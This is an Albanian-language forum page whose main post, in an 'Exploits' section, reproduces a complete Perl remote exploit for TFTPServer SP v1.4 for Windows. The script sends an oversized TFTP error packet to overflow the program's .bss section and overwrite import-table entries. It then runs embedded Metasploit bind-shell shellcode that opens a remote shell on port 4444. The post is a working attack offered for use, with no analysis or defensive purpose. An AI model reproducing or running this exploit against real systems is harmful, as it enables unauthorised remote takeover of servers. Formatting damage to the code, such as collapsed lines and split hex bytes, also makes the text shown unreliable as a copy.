ForumPortaliGalleryPytėsoriKėrkoLista AnėtarėveGrupet e AnėtarėveRegjistrohuidentifikimi
...:::Meny Kryesore:::...
 Home
 Portali
 Forum
 Lista e Antarve
 Galeria
 Lajmet Flash
 Profili
 FAQ
 Testi I Dashuris
favoritos.gif Media & Muzika
 Telivizionet Live
 Video Klipe
 Ruzulltatet Sportive
 Mp3 Falass
 Mp3 RAP
 Kerkesa Muzikore
 Melodi Per Celular
icon_community.gif Argėtim-Zbavitje
 Video Humoristike
 Luani Lojra
 Dezing
 Poezi
 Gediche
 Argėtime
 Albumi Fotografik
 Tema tė Ndryshme
som_downloads.gif Shkarkime & Links
King-Rap Tolbar
Programe
Shkarko Scripte
Chat Programs
 Kėrko nė Forum
 Liderėt e forumit
 Ndihmė
 Kėrko
Moti Momental

Permbajta e ksaj faqe kerkon flash player per instalim kliko mbi ket tekst.


Futu nė chat

Top 5 softuerėt antivirus pėr 2008
HTML clipboard
Top 5 softuerėt antivirus pėr 2008

1. Bit Defender

2. Kaspersky

3. Eset NOD32

4. Trend Micro Antivirus

    plus AntiSpyware 

5. F-Secure Anti-Virus 

SMS Falas nga KING-RaP
Partnerėt
>>> AlBaZeMeR <<<

XoFaCe

->>Ks-MaX <<<---

->> KoSoVa.Li <<<---

 ->> Muzik-Anglisht <<<---

V.I.P Galeri

Top posters
kanuni
 
Xhebraili
 
vissari
 
El-Fuego
 
drini-89
 
RiRi
 
dj-baba
 
dosti
 
king
 
miri
 
Keywords
shqip komandat 2012 gjata BAJRAM gashi murlan numrin elvana dashurie loja genta ismajli druri nika meda PORNO double dashuri nokia krasniqi numri celular kosoves shkronja anglisht
IP Addressa Juaj&Reklama
IP


Share | 
 

 TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit

Shiko temėn e mėparshme Shiko temėn pasuese Shko poshtė 
AutoriMesazh
El-Fuego



Numri i postimeve : 159
Join date : 12/06/2008
Age : 104
Location : Peja Morder City

MesazhTitulli: TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit   Thu Jun 12, 2008 8:17 pm

#!/usr/bin/perl# TFTPServer SP v1.4 for Windows remote .bss overflow exploit# The Service or the RunStandAlone version.# URL: http://sourceforge.net/projects/tftp-server/## Author: tix or tixxDZ # Date: 07/05/2008## Tested on Windows XP SP2 French not patched## TFTPServer SP v1.4 is vulnerable to a very long TFTP Error Packet# Other versions may also be vulnerable.## TFTPServer respect the RFC 1350 for Error packets, lot of other# TFTP Servers don't respect it.# TFTP Error Packet: "\x00\x05" . ErrorMsg . "\x00"## BUFFER is at 0041B3AB in the .bss section.# This exploit will overwrite all the .bss section and some portion of the .idata section# to patch functions addresses in the IAT.# # For the TFTPServer Service we will patch the time() function# For the TFTPServer StandAlone program we will patch the printf() function## BUFFER = NOPS + SHELLCODE + RET# we will put and execute our shellcode in the .idata section, .idata => RWE.use strict;use IO::Socket::INET;my $target = shift || die "Usage: $0 \n : type of the program\n". "\t for a TFTP service\n\t

for a TFTP simple program\n";my $type = defined $ARGV[0] ? shift : 's';my $shellcode =# windows/shell_bind_tcp - 500 bytes# http://www.metasploit.com# EXITFUNC=seh, LPORT=4444"\x3d\x71\x41\xbf\x75\x04\x66\x32\xfc\x2 f\x84\xd4\x15\x24" ."\x0a\xfd\x92\xb5\x48\x76\x4b\x19\xe3\x73\x0c\x77 \x4f\x0d" ."\x4a\x43\x4e\x7c\x75\x1d\x7d\x28\xd6\x96\x79\x14 \x91\x7b" ."\x1c\xb2\x72\x34\xa9\x9f\xb1\x73\x49\x70\x25\x98 \x7f\x13" ."\xf5\x88\xe1\x3f\x74\x2c\xba\x7e\x20\xc1\xd1\xe2 \x12\xe0" ."\x11\xd6\x6b\xd0\xe3\x40\xbf\x9f\x4a\x2f\xb9\xa8 \x3d\xd2" ."\xeb\x0c\x7a\x2b\xf9\x4b\x49\x71\x05\x76\x37\xb4 \xb3\x86" ."\xd5\x41\x97\x66\xba\x91\x46\xb5\x47\x48\x9b\x35 \xa9\x43" ."\x4f\xbe\xb7\x93\xfc\x2c\x25\x90\x3c\x99\x92\x77 \x02\xfd" ."\xb8\x42\x98\x15\x14\xb6\x3f\xd4\x27\xf8\x2d\xf5 \x24\x1c" ."\x67\xbb\x1d\x4e\xb0\xb2\x0d\xb1\x34\x04\x96\xbb \xa0\x0c" ."\xb8\xde\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85 \xc0\x75" ."\xf7\xc3\xfc\xe8\xee\xff\xff\xff\x5c\x66\x53\x93 \x74\x8e" ."\x5c\xd3\x7b\x11\x28\x40\xa7\xf6\xa5\xdc\x9b\x7d \xc5\xdb" ."\x9b\x80\xd9\x6f\x14\x9b\xae\x2f\x8a\x9a\x5b\x86 \x41\xa8" ."\x10\x18\xbb\xe0\xe6\x82\xef\x87\x27\xc0\xe8\x46 \x6d\x24" ."\xf7\x8a\x99\xc3\xcc\x5e\x7a\x04\x47\xba\x09\x0b \x83\x45" ."\xe5\xd2\x40\x49\xb2\x91\x09\x4e\x45\x4d\xb6\x42 \xce\x18" ."\xd4\xbe\xcc\x7b\xe7\x8e\x37\x1f\x6c\xb3\xf7\x6b \x32\x38" ."\x73\x1b\xae\xed\x08\x9c\xc6\xb3\x66\x93\x98\x45 \x9b\xfb" ."\xdb\x8c\x05\xaf\x45\x59\xf9\x7d\xe1\xee\x8e\xb3 \xae\x44" ."\x8e\x64\x38\xae\x9d\x79\x83\x60\xa1\x54\xac\x09 \xb8\x3f" ."\xd3\xe7\x4b\xc2\x86\x9d\x49\x3d\xf8\x0a\x97\xc8 \x0d\x67" ."\x70\x34\x3b\x2b\x2c\x99\x90\x9f\x91\x4e\x55\x73 \xe9\xa1" ."\x3f\x1b\x04\x1e\xd9\x88\xaf\x7f\xb0\x47\x14\x65 \xca\x50" ."\x03\x65\xfc\x35\xbc\xc8\x55\x35\x6c\x82\xf1\x64 \xa3\xba" ."\xae\x89\x6a\x6f\x05\x89\x43\xf8\x40\x3c\xe2\xb0 \xdd\x40" ."\x3c\x12\xb5\xea\x94\x6c\xe5\x80\x7f\x74\x7c\x61 \x06\x2d" ."\x81\xbb\xac\x2e\xad\x22\x25\xb5\x2b\xc3\xda\x58 \x3a\xf6" ."\x77\xf3\x65\xd0\x4b\x7a\x72\x48\x10\xf4\x9e\xbc \x58\xf5" ."\xf4\x41\x1a\xd7\xf6\xfc\xb7\xb4\x8b\x7b\xf0\x11 \x38\xd0" ."\x68\x14\xc0\x94\x7f\x27\x49\x9f\x80\x01\xea\x48 \x2d\xff" ."\x5d\x26\xbb\xfe\x0c\x99\x6e\x50\x51\xc9\xf9\xff \x74\xef" ."\x37\xac\x79\x26\xad\xac\x7a\xf0\xcd\x83\x0f\xa8 \xcd\xa7" ."\xcb\x33\xd1\x7e\x81\x44\xfd\x17\xd5\x31\xfa\xb8 \x46\xb9" ."\xd5\xb8\xb8\x45\xda\x46\x38\x46\xda\x46";my ($RET,$buffer) = "\x01\x01\x42\x00"; # in the .idata sectionif ($type =~ /p/i) { # "\x00\x05" + 20411 bytes needed to patch the printf() function at 00420360 # --------------------------------------------------------------------------- # 0040EB50 -FF25 60034200 JMP DWORD PTR DS:[<&msvcrt.printf>] # --------------------------------------------------------------------------- print STDOUT "Exploiting TFTPServer RunStandAlone program\n"; $buffer = "\x90" x 19907 . $shellcode . $RET;}else { # "\x00\x05" + 20459 bytes needed to patch the time() function at 00420390 # ------------------------------------------------------------------------ # 0040EB60 -FF25 90034200 JMP DWORD PTR DS:[<&msvcrt.time>] # ------------------------------------------------------------------------ print STDOUT "Exploiting TFTPServer Service program\n"; $buffer = "\x90" x 19955 . $shellcode . $RET;}my $sock = IO::Socket::INET->new( PeerAddr => $target, PeerPort => 69, Proto => 'udp') or die "error: $!\n";$sock->send("\x00\x05" . $buffer, 0); print STDOUT "done.\n";exit 0;

Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit
 
TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit
Shiko temėn e mėparshme Shiko temėn pasuese Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: ..:: INFORMATIKA ::.. :: Exploits-
Kėrce tek: